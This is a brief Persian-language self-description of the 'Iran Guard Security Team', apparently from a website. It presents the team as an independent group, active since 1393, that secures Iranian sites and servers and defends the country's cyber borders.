تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.
×